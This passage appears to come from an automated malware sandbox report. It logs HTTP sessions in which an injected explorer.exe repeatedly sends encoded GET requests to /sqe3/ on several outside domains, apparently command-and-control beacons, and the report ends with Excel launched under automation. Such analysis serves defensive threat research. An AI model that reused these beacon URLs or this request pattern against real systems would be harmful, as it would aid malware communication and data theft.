                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 26, 2020 21:14:05.615524054 CET517INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 26 Nov 2020 20:14:05 GMT
                                                                                                                                                                        Server: Apache/2.4.10
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                        Data Raw: 35 64 31 30 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6c 22 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 20 3c 74 69 74 6c 65 3e 44 6f 6d 65 69 6e 20 47 65 72 65 73 65 72 76 65 65 72 64 20 2d 20 4d 69 6a 6e 64 6f 6d 65 69 6e 2e 6e 6c 3c 2f 74 69 74 6c 65 3e 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 33 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 20 3c 73 74 79 6c 65 3e 20 2a 20 7b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 7d 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 7d 20 2e 73 69 74 65 2d 66 72 61 6d 65 20 7b 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 70 61 64 64 69 6e 67 3a 20 30 20 31 35 70 78 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 7d 20 2f 2a 20 54 79 70 65 20 73 74 79 6c 65 73 20 2a 2f 20 73 74 72 6f 6e 67 20 7b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 20 7d 20 2e 68 65 61 64 69 6e 67 2d 62 6c 6f 63 6b 20 7b 20 66 6f 6e 74 3a 20 37 30 30 20 33 32 70 78 2f 33 39 70 78 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 35 70 78 3b 20 7d 20 2e 68 65 61 64 69 6e 67 2d 74 69 74 6c 65 20 7b 20 66 6f 6e 74 3a 20 37 30 30 20 32 30 70 78 2f 32 34 70 78 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 3b 20 7d 20 2e 63 6f 70 79 2d 64 65 66 61 75 6c 74 20 7b 20 66 6f 6e 74 3a 20 33 30 30 20 31 36 70 78 2f 32 30 70 78 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 3b 20 7d 20 2e 63 6f 70 79 2d 63 61 70 74 69 6f 6e 20 7b 20 66 6f 6e 74 3a 20 34 30 30 20 31 34 70 78 2f 31 38 70 78 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 20 2f 2a 20 45 6e 64 20 74 79 70 65 20 73 74 79 6c 65 73 20 2a 2f 20 2f 2a 20 42 75 74 74 6f 6e 20 73 74
                                                                                                                                                                        Data Ascii: 5d101<!doctype html><html lang="nl"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Domein Gereserveerd - Mijndomein.nl</title> <link href="https://fonts.googleapis.com/css?family=Montserrat:300,400,700" rel="stylesheet"> <style> * { margin: 0; padding: 0; border: 0; } html, body { width: 100%; height: 100%; } .site-frame { max-width: 1120px; margin: 0 auto; position: relative; padding: 0 15px; -webkit-box-sizing: border-box; box-sizing: border-box; } /* Type styles */ strong { font-weight: 700; } .heading-block { font: 700 32px/39px 'Montserrat', Helvetica, Arial, Verdana, sans-serif; margin: 0 0 15px; } .heading-title { font: 700 20px/24px 'Montserrat', Helvetica, Arial, Verdana, sans-serif; margin: 0 0 20px; } .copy-default { font: 300 16px/20px 'Montserrat', Helvetica, Arial, Verdana, sans-serif; margin: 0 0 20px; } .copy-caption { font: 400 14px/18px 'Montserrat', Helvetica, Arial, Verdana, sans-serif; margin: 0 0 15px; text-align: center; } /* End type styles */ /* Button st


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        5192.168.2.224917023.227.38.7480C:\Windows\explorer.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Nov 26, 2020 21:14:10.739721060 CET603OUTGET /sqe3/?cB=oXNDcZDlqRKH2hC5SoJ7dwvXOnFb9nMS++dxAtrFY1wLaleqRTsShLolmYf7RNmK9qOopw==&NreT=XJE0G4nHflj HTTP/1.1
                                                                                                                                                                        Host: www.cocogreensoil.com
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 26, 2020 21:14:10.893620014 CET605INHTTP/1.1 403 Forbidden
                                                                                                                                                                        Date: Thu, 26 Nov 2020 20:14:10 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        X-Sorting-Hat-PodId: 156
                                                                                                                                                                        X-Sorting-Hat-ShopId: 49082073245
                                                                                                                                                                        X-Dc: gcp-us-central1
                                                                                                                                                                        X-Request-ID: 7477f6ab-95f2-4a58-8640-a3ddf41aad41
                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                        cf-request-id: 06a7ca353d00000ea7272af000000001
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 5f8646352e050ea7-FRA
                                                                                                                                                                        Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74
                                                                                                                                                                        Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-it


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        6192.168.2.224917166.96.162.13880C:\Windows\explorer.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Nov 26, 2020 21:14:16.132878065 CET610OUTGET /sqe3/?cB=M2gi/2rftereO9YfyWfvr6V5Ia0b0txn97j0jlakpXVUd1e6zNbyBzYXevWhAV4c0pce3g==&NreT=XJE0G4nHflj HTTP/1.1
                                                                                                                                                                        Host: www.moveoneic.com
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 26, 2020 21:14:16.262269974 CET611INHTTP/1.1 302 Found
                                                                                                                                                                        Date: Thu, 26 Nov 2020 20:14:16 GMT
                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                        Content-Length: 312
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Server: Apache/2
                                                                                                                                                                        Location: https://www.moveoneic.com/sqe3/?cB=M2gi/2rftereO9YfyWfvr6V5Ia0b0txn97j0jlakpXVUd1e6zNbyBzYXevWhAV4c0pce3g==&NreT=XJE0G4nHflj
                                                                                                                                                                        Cache-Control: max-age=3600
                                                                                                                                                                        Expires: Thu, 26 Nov 2020 21:14:16 GMT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Age: 0
                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 6f 76 65 6f 6e 65 69 63 2e 63 6f 6d 2f 73 71 65 33 2f 3f 63 42 3d 4d 32 67 69 2f 32 72 66 74 65 72 65 4f 39 59 66 79 57 66 76 72 36 56 35 49 61 30 62 30 74 78 6e 39 37 6a 30 6a 6c 61 6b 70 58 56 55 64 31 65 36 7a 4e 62 79 42 7a 59 58 65 76 57 68 41 56 34 63 30 70 63 65 33 67 3d 3d 26 61 6d 70 3b 4e 72 65 54 3d 58 4a 45 30 47 34 6e 48 66 6c 6a 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.moveoneic.com/sqe3/?cB=M2gi/2rftereO9YfyWfvr6V5Ia0b0txn97j0jlakpXVUd1e6zNbyBzYXevWhAV4c0pce3g==&amp;NreT=XJE0G4nHflj">here</a>.</p></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        7192.168.2.224917285.10.195.22780C:\Windows\explorer.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Nov 26, 2020 21:14:21.416049957 CET612OUTGET /sqe3/?cB=i8a2XrM6c4PzlxrBAf6zuAf3nKYqRmED7KfomvOZBUX2ic3/OKgutfqGct8PuPO2yhcJFA==&NreT=XJE0G4nHflj HTTP/1.1
                                                                                                                                                                        Host: www.antillean-network.com
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 26, 2020 21:14:21.436963081 CET613INHTTP/1.1 404 Not Found
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 1236
                                                                                                                                                                        Date: Thu, 26 Nov 2020 20:14:21 GMT
                                                                                                                                                                        Server: LiteSpeed
                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65
                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpe


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        8192.168.2.2249173192.161.187.20080C:\Windows\explorer.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Nov 26, 2020 21:14:26.774002075 CET614OUTGET /sqe3/?cB=ce2vMfxvjNzpIiuEEVRdBe9TyXbD+nO4E4YWLS1QBhRwWXpWwU+RSJ1ydcmIzRpEWYQ4mQ==&NreT=XJE0G4nHflj HTTP/1.1
                                                                                                                                                                        Host: www.integratednourishment.com
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 26, 2020 21:14:26.931380987 CET615INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Thu, 26 Nov 2020 20:14:26 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 154
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Location: http://www.integratednourishment.com?cB=ce2vMfxvjNzpIiuEEVRdBe9TyXbD+nO4E4YWLS1QBhRwWXpWwU+RSJ1ydcmIzRpEWYQ4mQ==&NreT=XJE0G4nHflj
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        9192.168.2.2249174104.16.16.19480C:\Windows\explorer.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Nov 26, 2020 21:14:32.007437944 CET616OUTGET /sqe3/?cB=cV0NQ3cSoEjVqYMmg/VwqmhA8djIFQLMz29YYbqh0iCirm1PpN4CjJrzlAb4Rx9TAdAIgw==&NreT=XJE0G4nHflj HTTP/1.1
                                                                                                                                                                        Host: www.gregoryrecommends.com
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 26, 2020 21:14:32.320785046 CET617INHTTP/1.1 302 Found
                                                                                                                                                                        Date: Thu, 26 Nov 2020 20:14:32 GMT
                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: __cfduid=de07a9064bc53e0f0489b012ffee72c6c1606421672; expires=Sat, 26-Dec-20 20:14:32 GMT; path=/; domain=.www.gregoryrecommends.com; HttpOnly; SameSite=Lax
                                                                                                                                                                        Location: http://www.gregoryrecommends.com/nopage_error.html
                                                                                                                                                                        CF-Ray: 5f8646ba1a1d05ed-FRA
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        CF-Cache-Status: MISS
                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization
                                                                                                                                                                        Access-Control-Allow-Methods: GET, PUT, POST, DELETE, PATCH, OPTIONS
                                                                                                                                                                        cf-request-id: 06a7ca884d000005ed1a366000000001
                                                                                                                                                                        Status: 302 Found
                                                                                                                                                                        X-Frame-Options: ALLOWALL
                                                                                                                                                                        X-Powered-By: Phusion Passenger Enterprise 6.0.2
                                                                                                                                                                        X-Rack-Cache: miss
                                                                                                                                                                        X-Request-Id: 38afb9744787aa13a8ed15f003226fb5
                                                                                                                                                                        X-Runtime: 0.133626
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        Data Raw: 37 34 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 65 67 6f 72 79 72 65 63 6f 6d 6d 65 6e 64 73 2e 63 6f 6d 2f 6e 6f 70 61 67 65 5f 65 72 72 6f 72 2e 68 74 6d 6c 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: 74<html><body>You are being <a href="http://www.gregoryrecommends.com/nopage_error.html">redirected</a>.</body></html>


                                                                                                                                                                        Code Manipulations

                                                                                                                                                                        Statistics

                                                                                                                                                                        Behavior

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        System Behavior

                                                                                                                                                                        General

                                                                                                                                                                        Start time:21:12:38
                                                                                                                                                                        Start date:26/11/2020
                                                                                                                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                        Imagebase:0x13fdc0000
                                                                                                                                                                        File size:27641504 bytes
